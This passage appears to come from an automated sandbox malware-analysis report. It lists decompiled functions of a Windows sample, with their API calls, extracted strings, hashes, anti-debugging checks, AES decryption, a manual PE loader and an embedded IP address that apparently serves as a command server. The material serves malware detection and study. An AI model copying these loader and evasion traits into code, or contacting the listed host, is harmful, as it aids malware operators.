                          • Part of subcall function 04952487: CloseHandle.KERNEL32(00000000), ref: 049524E5
                        • __Init_thread_footer.LIBCMT ref: 04954489
                          • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                          • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Init_thread_footer$CriticalSection$File$CreateEnterLeavePathSleepTime$ByteCharCloseFolderHandleInitializeInstanceMultiSystemTempUnothrow_t@std@@@WideWrite__ehfuncinfo$??2@
                        • String ID: 185.156.72.65$O@K\$Y@BA$ZK\.$rmBK
                        • API String ID: 529012138-2214808123
                        • Opcode ID: 80f03fce48ad90c555d326397e9bffadaef10e10c65fa4ab2e04da8cea0e0d82
                        • Instruction ID: 175f9b9b8e5e0ed6967ab2b4efcc17d5098a5b891e341e984bef65d0d0da54a3
                        • Opcode Fuzzy Hash: 80f03fce48ad90c555d326397e9bffadaef10e10c65fa4ab2e04da8cea0e0d82
                        • Instruction Fuzzy Hash: 52F2D1B0D042549FEB24CF24DC48BADBBB4AF44308F6442E8E8096B2A1D775BAC5CF55
                        Function 00402EE0 Relevance: 33.7, APIs: 11, Strings: 8, Instructions: 454COMMON
                        Download Yara Rule
                        APIs
                        • SetLastError.KERNEL32(0000000D), ref: 00402F02
                        • SetLastError.KERNEL32(000000C1), ref: 00402F44
                        Strings
                        • DOS header is not valid!, xrefs: 00402F32
                        • alignedImageSize != AlignValueUp!, xrefs: 0040302C
                        • FileHeader.Machine != HOST_MACHINE!, xrefs: 00402FB3
                        • Size is not valid!, xrefs: 00402F08
                        • Signature != IMAGE_NT_SIGNATURE!, xrefs: 00402FA1
                        • ERROR_OUTOFMEMORY!, xrefs: 00403062
                        • DOS header size is not valid!, xrefs: 00402F71
                        • Section alignment invalid!, xrefs: 00402FC7
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast
                        • String ID: DOS header is not valid!$DOS header size is not valid!$ERROR_OUTOFMEMORY!$FileHeader.Machine != HOST_MACHINE!$Section alignment invalid!$Signature != IMAGE_NT_SIGNATURE!$Size is not valid!$alignedImageSize != AlignValueUp!
                        • API String ID: 1452528299-2436911586
                        • Opcode ID: 969231b7725f6e648ae7b53270e343726ac677e9ab86d7066b7749be6261437e
                        • Instruction ID: feefb59cb084f329bf9f2ee3fcaf904be4f7c95626e3fbc9d9f9d2488596d2a7
                        • Opcode Fuzzy Hash: 969231b7725f6e648ae7b53270e343726ac677e9ab86d7066b7749be6261437e
                        • Instruction Fuzzy Hash: C3F1AC71B00205ABCB10CF69D985BAAB7B4BF48705F14407AE909EB6C1D779ED11CB98
                        Function 004035D0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 225encryptionCOMMON
                        Download Yara Rule
                        APIs
                        • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,B6DBD0D4), ref: 00403650
                        • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00403674
                        • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 004036DE
                        • GetLastError.KERNEL32 ref: 004036E8
                        • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 00403710
                        • GetLastError.KERNEL32 ref: 0040371A
                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040372A
                        • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 004037EC
                        • CryptDestroyKey.ADVAPI32(?), ref: 0040385E
                        Strings
                        • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 0040362C
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease
                        • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                        • API String ID: 3761881897-63410773
                        • Opcode ID: d367fb143b6554c856abbd5ed66d5e96836dac5444f5810d3b21dde5d4a3622d
                        • Instruction ID: 2781db946ec69ebb5a82e2500c6cd73aae13b8bfd69ebbb4ddbc14150c00f762
                        • Opcode Fuzzy Hash: d367fb143b6554c856abbd5ed66d5e96836dac5444f5810d3b21dde5d4a3622d
                        • Instruction Fuzzy Hash: DF819F71A00218AFEF209F25CC45B9ABBB9FF49300F1481BAF50DA7291DB359E858F55
                        Function 04953837 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 225encryptionCOMMON
                        Download Yara Rule
                        APIs
                        • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,0042C014), ref: 049538B7
                        • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 049538DB
                        • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 04953945
                        • GetLastError.KERNEL32 ref: 0495394F
                        • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 04953977
                        • GetLastError.KERNEL32 ref: 04953981
                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 04953991
                        • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 04953A53
                        • CryptDestroyKey.ADVAPI32(?), ref: 04953AC5
                        Strings
                        • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 04953893
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease
                        • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                        • API String ID: 3761881897-63410773
                        • Opcode ID: 6e6210ff55f32b3241f3b0da8e138babaf92a1c0b82018977fa48d91ab2d5297
                        • Instruction ID: 59e7dc52144a8d82591a686373c6de8e293fa5690d896e85b7fa2fa1b2dd26a3
                        • Opcode Fuzzy Hash: 6e6210ff55f32b3241f3b0da8e138babaf92a1c0b82018977fa48d91ab2d5297
                        • Instruction Fuzzy Hash: FD816171A002189FEB24DF24CC45B9ABBB5EF45340F1481B9E94DE72A1DB31AE858F51
                        Function 00402A50 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 113memorywindowCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualProtect.KERNEL32(?,?,?,?), ref: 00402AF8
                        • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 00402B0D
                        • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 00402B1B
                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 00402B36
                        • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 00402B55
                        • LocalFree.KERNEL32(00000000), ref: 00402B62
                        • LocalFree.KERNEL32(?), ref: 00402B67
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$Free$AllocDebugErrorFormatLastMessageOutputProtectStringVirtual
                        • String ID: %s: %s$Error protecting memory page
                        • API String ID: 839691724-1484484497
                        • Opcode ID: 9750dd737f677cfe2bf35afdb918f3e7736876f76d8ddec4ee516f8fc37c3b4c
                        • Instruction ID: 7115b4f99f47229cfead79ad45df677009e1c347b6b4b41756aa32ea0cb5f428
                        • Opcode Fuzzy Hash: 9750dd737f677cfe2bf35afdb918f3e7736876f76d8ddec4ee516f8fc37c3b4c
                        • Instruction Fuzzy Hash: A0311431B00104AFDB10DF58DD45FAAB7A8EF48704F4541BAE905EB2D2DB79AD06CB98
                        Function 049551D7 Relevance: 12.9, APIs: 5, Strings: 2, Instructions: 621sleepCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 04960A89: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,04955D06,00000000,0042C014), ref: 04960A9E
                          • Part of subcall function 04960A89: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04960ABD
                          • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                          • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                        • __Init_thread_footer.LIBCMT ref: 04955344
                        • Sleep.KERNEL32(00000BB8,00000000,?,04956D08,0041D8D0,0042DBDC,0042DBDD), ref: 0495555C
                        • __Init_thread_footer.LIBCMT ref: 04955652
                        • Sleep.KERNEL32(000007D0), ref: 049559BC
                        • Sleep.KERNEL32(000007D0), ref: 049559D6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep$CriticalInit_thread_footerSectionTime$EnterFileLeaveSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                        • String ID: @BAO$updateSW
                        • API String ID: 3554146954-956047173
                        • Opcode ID: 459a83f2fd3c5c07858fe4c4e2d786a264afa78a17bbb4541cda9f244f9323ee
                        • Instruction ID: cb50f06d884e9880f0ef62a95241579db65518dc8b806f430c65bdc54610dab4
                        • Opcode Fuzzy Hash: 459a83f2fd3c5c07858fe4c4e2d786a264afa78a17bbb4541cda9f244f9323ee
                        • Instruction Fuzzy Hash: 953213B0D00254DBEB28DF24CC987ADBBB4AF40314F6542F9D8096B2A6D775AE84CF45
                        Function 005E8A9E Relevance: 11.6, Strings: 8, Instructions: 1634COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID: $"}o$+Uuo$/1]$IP?5$]d*D$l-:$ni$zz>
                        • API String ID: 0-3313172819
                        • Opcode ID: 94ae598debca9667c48e9d82285888671873edb2ae1d013e20654a0f3ce9c6ab
                        • Instruction ID: d48a93fd504ac1afe5a9e746768a5d01bb23ab430b84ffe0370f700ef0df9790
                        • Opcode Fuzzy Hash: 94ae598debca9667c48e9d82285888671873edb2ae1d013e20654a0f3ce9c6ab
                        • Instruction Fuzzy Hash: A2B259F3A082149FE3046E2DEC8567ABBD9EFD4720F1A863DEAC4C7744E93558018796
                        Function 0041A346 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1473COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __floor_pentium4
                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                        • API String ID: 4168288129-2761157908
                        • Opcode ID: 55dd87499faf8fcf66fe19d6c791e996a87d6224a05bf9275e3249bc6ed21a11
                        • Instruction ID: 4ec5cfcd79f9b81e0d104b8321146cba3f0ab1dc6500a030f703b9c7425dc3b2
                        • Opcode Fuzzy Hash: 55dd87499faf8fcf66fe19d6c791e996a87d6224a05bf9275e3249bc6ed21a11
                        • Instruction Fuzzy Hash: E8D21671E092288FDB65CE28DD807EAB7B5EB44305F1441EAD80DE7240E778AEC58F85
                        Function 005F113E Relevance: 9.1, Strings: 6, Instructions: 1582COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID: <E~$n$G$on}${:g~$=e$i=+
                        • API String ID: 0-1581083642
                        • Opcode ID: 369acf3da22c7666c3e2bf8cbb53c6908a3deffb1b645d2a02021bed22549266
                        • Instruction ID: beae00a562f48c514757c634c6a22f33a5a24c0287a0bf4d0a7c06c64e182fa4
                        • Opcode Fuzzy Hash: 369acf3da22c7666c3e2bf8cbb53c6908a3deffb1b645d2a02021bed22549266
                        • Instruction Fuzzy Hash: BFB2D5F3A0C200AFE3046E2DEC8577ABBE9EB94720F1A493DE6C5C7744E63558058697
                        Function 00401970 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 293networkfileCOMMON
                        Download Yara Rule
                        APIs
                        • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 00401A05
                        • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 00401A28
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileInternet$PointerRead
                        • String ID: text
                        • API String ID: 3197321146-999008199
                        • Opcode ID: 0d5891a278ce307004780994f853f58be742df4ecfdd0caad83694c416481f12
                        • Instruction ID: 56e9ac6e571947bcf275884445d614b5348a2aaf1a2f7cc802118cd3fea156c2
                        • Opcode Fuzzy Hash: 0d5891a278ce307004780994f853f58be742df4ecfdd0caad83694c416481f12
                        • Instruction Fuzzy Hash: 10C13970A002189FDB24DF54CC85BE9B7B5EF49304F1041EAE409B72A1DB78AE95CF99
                        Function 005E5C01 Relevance: 8.5, Strings: 6, Instructions: 977COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID: W??r$n"gx$u9?U$H~$H~$ym?
                        • API String ID: 0-3581525400
                        • Opcode ID: 8ebe3780c41065c719bb8b7c5a8f10489e6a4148139408f13cbfc6aca33fdb62
                        • Instruction ID: 600f5e5ce130d5af03e6248d4f3ee76bccf979909c3eb6c468e81f8796aa6e15
                        • Opcode Fuzzy Hash: 8ebe3780c41065c719bb8b7c5a8f10489e6a4148139408f13cbfc6aca33fdb62
                        • Instruction Fuzzy Hash: 1A62D4F260C2009FE304AF29EC8567AFBE9EF94710F16892DE6C5C7744E63598418B97
                        Function 005EC05B Relevance: 7.8, Strings: 5, Instructions: 1532COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID: !>o}$Z~*X$]d77$U6B$~mk
                        • API String ID: 0-740477519
                        • Opcode ID: 2af0a87fd24a42abb2eb39dc87a612688ab7b5a78cd91fcff7915cb24cf2eb42
                        • Instruction ID: 2dbe4847cb61108cd19f2dc8696ed94df50bc230eadd9dfa42d7aafac900326a
                        • Opcode Fuzzy Hash: 2af0a87fd24a42abb2eb39dc87a612688ab7b5a78cd91fcff7915cb24cf2eb42
                        • Instruction Fuzzy Hash: E4B2C4F360C204AFE304AE29DC8567AFBE5EF94720F1A493DE6C4C3744EA3598518697
                        Function 005EDB13 Relevance: 6.7, Strings: 4, Instructions: 1667COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID: nyW$I_U$Rk+k$UD??
                        • API String ID: 0-595018789
                        • Opcode ID: e0ecedbaf39fe1604cee461af2e5e91049e79c68badc646ff6df55b377585385
                        • Instruction ID: 21b5e0e20b973e241d8d3072894f572549cf6fa3775ad57c84a380beb097d287
                        • Opcode Fuzzy Hash: e0ecedbaf39fe1604cee461af2e5e91049e79c68badc646ff6df55b377585385
                        • Instruction Fuzzy Hash: 64B2F5F360C2049FE304AE2DEC8567ABBE9EF94620F16493DE6C5C7744EA3598018697
                        Function 005E6FC3 Relevance: 6.7, Strings: 4, Instructions: 1660COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID: q?$,g{$`(\_$TRI
                        • API String ID: 0-1560283197
                        • Opcode ID: 1d367cab717bf88585965e879034d9c3f1aec5cdc909396fe176608216141ee1
                        • Instruction ID: 1a21af606a6e270031f1ec5ceafb5de0007a572ed58844c6353aa21b2015560d
                        • Opcode Fuzzy Hash: 1d367cab717bf88585965e879034d9c3f1aec5cdc909396fe176608216141ee1
                        • Instruction Fuzzy Hash: 26B2F9F360C2049FE304BE2DEC8567ABBE9EB94720F1A453DEAC4C7744E93598058697
                        Function 00410940 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
                        • Instruction ID: 78ffdd1b1e8fbf681df67024148688f8aa54f57810aac3ba8850cddb3c6bfb2a
                        • Opcode Fuzzy Hash: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
                        • Instruction Fuzzy Hash: 87024D71E002199BDF14CFA9D9806EEBBB1FF48314F24826AE519E7340D775A981CB94
                        Function 04960BA7 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
                        • Instruction ID: 5870f6e88b346de3dd458830fb0bab3246a4d891899ac372411a492dd1262dbd
                        • Opcode Fuzzy Hash: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
                        • Instruction Fuzzy Hash: B9022D71E012199FDF14CFA8D9D0AAEBBB5FF48314F248269D91AEB340D731A941CB90
                        Function 0040A58A Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                        Download Yara Rule
                        APIs
                        • IsProcessorFeaturePresent.KERNEL32(00000017,00181B20), ref: 0040A596
                        • IsDebuggerPresent.KERNEL32 ref: 0040A662
                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040A682
                        • UnhandledExceptionFilter.KERNEL32(?), ref: 0040A68C
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                        • String ID:
                        • API String ID: 254469556-0
                        • Opcode ID: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                        • Instruction ID: e2fd69841e347503e8527ce1becac27b78df2bbd7224e42b4cf7edbda655d181
                        • Opcode Fuzzy Hash: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                        • Instruction Fuzzy Hash: 04313A75D4131CDBDB10DFA5D989BCDBBB8BF08304F1080AAE408A7290EB759E858F49
                        Function 0495A7F1 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                        Download Yara Rule
                        APIs
                        • IsProcessorFeaturePresent.KERNEL32(00000017,00181B20), ref: 0495A7FD
                        • IsDebuggerPresent.KERNEL32 ref: 0495A8C9
                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0495A8E9
                        • UnhandledExceptionFilter.KERNEL32(?), ref: 0495A8F3
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                        • String ID:
                        • API String ID: 254469556-0
                        • Opcode ID: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                        • Instruction ID: d80dbb66706cfd000b64b7993774e351344232ebf29181e0be46c47f672497d0
                        • Opcode Fuzzy Hash: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                        • Instruction Fuzzy Hash: 9931E975D0521DDBDB10DFA4D9497CCBBB8BF08304F2041AAE509A7250EB715A858F49
                        Function 0040CDE3 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0040CEDB
                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040CEE5
                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0040CEF2
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                        • String ID:
                        • API String ID: 3906539128-0
                        • Opcode ID: e436a8829045c153a86cd1f8a8b118e982bc3228d08815e2757f6e40e94fe856
                        • Instruction ID: c8210cab332152a7f303cacbc0cae8b9100ca1fc91568f2564f16f954c9570b7
                        • Opcode Fuzzy Hash: e436a8829045c153a86cd1f8a8b118e982bc3228d08815e2757f6e40e94fe856
                        • Instruction Fuzzy Hash: 3331D574941218EBCB21DF65D8897CDBBB4BF08314F5082EAE81CA7291E7749F858F49
                        Function 0495D04A Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,04952AA0), ref: 0495D142
                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,04952AA0), ref: 0495D14C
                        • UnhandledExceptionFilter.KERNEL32(0495277A,?,?,?,?,?,04952AA0), ref: 0495D159
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                        • String ID:
                        • API String ID: 3906539128-0
                        • Opcode ID: eab9de89e4f223b0e8801f8ff3c4edb53ba30b9f948264c96fa02635900acdf3
                        • Instruction ID: c2750cbfe8e65d27d420d393e087f44d5dc05252f40ce80360e105cbb7549b49
                        • Opcode Fuzzy Hash: eab9de89e4f223b0e8801f8ff3c4edb53ba30b9f948264c96fa02635900acdf3
                        • Instruction Fuzzy Hash: 1C31CA749012289BCB21DF64DC897CCB7B8BF48310F6081EAE80CA7260E7709F858F44
                        Function 0495092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: .$GetProcAddress.$l
                        • API String ID: 0-2784972518
                        • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                        • Instruction ID: dda99c21e20aebc667b716420b59f138b9c13632cd9a7e34b5f863dc2035b6ef
                        • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                        • Instruction Fuzzy Hash: F1315CB6900609DFDB10CF99C880AADBBF9FF48324F24445AD941A7324D771FA45CBA4
                        Function 00410822 Relevance: 3.0, APIs: 2, Instructions: 44timeCOMMON
                        Download Yara Rule
                        APIs
                        • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,B6DBD0D4), ref: 00410837
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                        • String ID:
                        • API String ID: 1518329722-0
                        • Opcode ID: e180163b605ce24ec50b538605d54e7015c692564284d471828b5f4d87c2059b
                        • Instruction ID: 1c50189d93918816d196ec70bd43d3640a511bc00310eef3747ee1678f9f3f9c
                        • Opcode Fuzzy Hash: e180163b605ce24ec50b538605d54e7015c692564284d471828b5f4d87c2059b
                        • Instruction Fuzzy Hash: 09F0F9B1E002147B8724AF6EC8049DFBEE9EEC5770725465AE809D3340D5B4CD8182D4
                        Function 00473544 Relevance: 2.8, Strings: 2, Instructions: 256COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID: 3q$ltO
                        • API String ID: 0-2248738698
                        • Opcode ID: 5fb0fda2e941a74d82e20f728731b978e527cb9f13e9e4702f87f915931d4add
                        • Instruction ID: 883e4d567d952c6094fff444558f9395b5cb8217f61cb5b106da6e8980b9fb27
                        • Opcode Fuzzy Hash: 5fb0fda2e941a74d82e20f728731b978e527cb9f13e9e4702f87f915931d4add
                        • Instruction Fuzzy Hash: F881D2F3A086149BE3146E69DC8476ABBE5EF94710F1B063DDAC497380EA79184487C6
                        Function 00473086 Relevance: 2.8, Strings: 2, Instructions: 256COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID: 3q$ltO
                        • API String ID: 0-2248738698
                        • Opcode ID: 92a57e490e57758581ae30ef2d903f63384275deab7bba2ebdac176a05281f88
                        • Instruction ID: 59807cd3639f71214cf448f03cd7277199c29e26e1c310282b78b7a2ff65f9b4
                        • Opcode Fuzzy Hash: 92a57e490e57758581ae30ef2d903f63384275deab7bba2ebdac176a05281f88
                        • Instruction Fuzzy Hash: 7F81C1F3E086149BE3146E69DC847AABBE5EF94710F1B063DDBC497380E979184487C6
                        Function 0041572E Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00415729,?,?,00000008,?,?,0041C68A,00000000), ref: 0041595B
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionRaise
                        • String ID:
                        • API String ID: 3997070919-0
                        • Opcode ID: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
